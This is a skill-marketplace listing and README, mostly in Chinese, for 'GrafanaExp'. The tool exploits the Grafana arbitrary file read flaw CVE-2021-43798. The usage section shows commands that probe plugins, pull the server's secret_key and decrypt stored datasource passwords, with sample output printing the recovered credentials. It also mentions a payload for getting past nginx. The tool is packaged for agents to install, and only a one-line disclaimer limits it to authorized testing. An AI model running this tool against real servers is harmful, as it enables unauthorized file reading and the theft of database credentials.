GrafanaExp

A exploit tool for Grafana Unauthorized arbitrary file reading vulnerability (CVE-2021-43798), it can burst plugins / extract secret_key / decrypt data_source info automatic.

Generate Convert Improve

Install / Use

/learn @A-D-Team/GrafanaExp

About this skill

Quality Score

0/100

README

grafanaExp

利用grafana CVE-2021-43798任意文件读漏洞，自动探测是否有漏洞、存在的plugin、提取密钥、解密server端db文件，并输出data_sourrce信息。

使用方法

提供exp和decode功能。

➜  ./grafanaExp -h
NAME:
   grafanaExp - Exploit Grafana with CVE-2021-43798 Arbitrary File Read.

USAGE:
   grafanaExp [global options] command [command options] [arguments...]

AUTHOR:
   A&D-Team

COMMANDS:
   exp      -u [url] -p [plugin] -c [config] -d [db] -k [key]
   decode   decode -f [dbfile] -k [key]
   help, h  Shows a list of commands or help for one command

GLOBAL OPTIONS:
   --help, -h  show help (default: false)

Exp

自动探测是否有漏洞、存在的plugin、提取密钥、解密server端db文件，并输出data_souce信息：

➜  ./grafanaExp exp -u http://localhost:3000/ 
2021/12/07 22:19:10 Target vulnerable has plugin [alertlist]
2021/12/07 22:19:10 Get secret_key [SW2YcwTIb9zpOOhoPsMm]
2021/12/07 22:19:10 type:[mysql]        name:[MySQL_01]         url:[test.mysql.io:3306]        user:[root]     password[rootpassword]  database:[test_dbname]  basic_auth_user:[]      basic_auth_password:[]
2021/12/07 22:19:10 type:[mssql]        name:[Mssql_01]         url:[test_sqlserver:1433]       user:[admin]    password[adminpassword] database:[db_sqlserver] basic_auth_user:[]      basic_auth_password:[]
2021/12/07 22:19:10 type:[elasticsearch]        name:[es_01]            url:[http://localhost:9200]     user:[] password[]      database:[]     basic_auth_user:[basic_user]    basic_auth_password:[basic_pass]
2021/12/07 22:19:10 type:[postgres]     name:[Postgre_01]               url:[Postgre_01:5432]   user:[pppp]     password[sssswwwww]     database:[postgredb]    basic_auth_user:[]      basic_auth_password:[]
2021/12/07 22:19:10 All Done, have nice day!

Decode

当DB文件太大的时候，可先下载到本地，之后再本地解密：

➜ ./grafanaExp decode -f grafana.db -k SW2YcwTIb9zpOOhoPsMm
2021/12/07 23:00:20 type:[mysql]        name:[MySQL_01]         url:[test.mysql.io:3306]        user:[root]     password[rootpassword]  database:[test_dbname]  basic_auth_user:[]      basic_auth_password:[]
2021/12/07 23:00:20 type:[mssql]        name:[Mssql_01]         url:[test_sqlserver:1433]       user:[admin]    password[adminpassword] database:[db_sqlserver] basic_auth_user:[]      basic_auth_password:[]
2021/12/07 23:00:20 type:[elasticsearch]        name:[es_01]            url:[http://localhost:9200]     user:[] password[]      database:[]     basic_auth_user:[basic_user]    basic_auth_password:[basic_pass]
2021/12/07 23:00:20 type:[postgres]     name:[Postgre_01]               url:[Postgre_01:5432]   user:[pppp]     password[sssswwwww]     database:[postgredb]    basic_auth_user:[]      basic_auth_password:[]

更新

1、支持https （昨天没加因为 transport会有一些奇奇怪怪的问题
2、增加darwin的执行文件
3、增加绕过nginx的paylaod （裸改了一下net/http

申明

本程序应仅用于授权的安全测试与研究目的

Related Skills

node-connect

348.5k

Diagnose OpenClaw node connection and pairing failures for Android, iOS, and macOS companion apps

frontend-design

109.1k

Create distinctive, production-grade frontend interfaces with high design quality. Use this skill when the user asks to build web components, pages, or applications. Generates creative, polished code that avoids generic AI aesthetics.

openai-whisper-api

348.5k

Transcribe audio via OpenAI Audio Transcriptions API (Whisper).

qqbot-media

348.5k

QQBot 富媒体收发能力。使用 <qqmedia> 标签，系统根据文件扩展名自动识别类型（图片/语音/视频/文件）。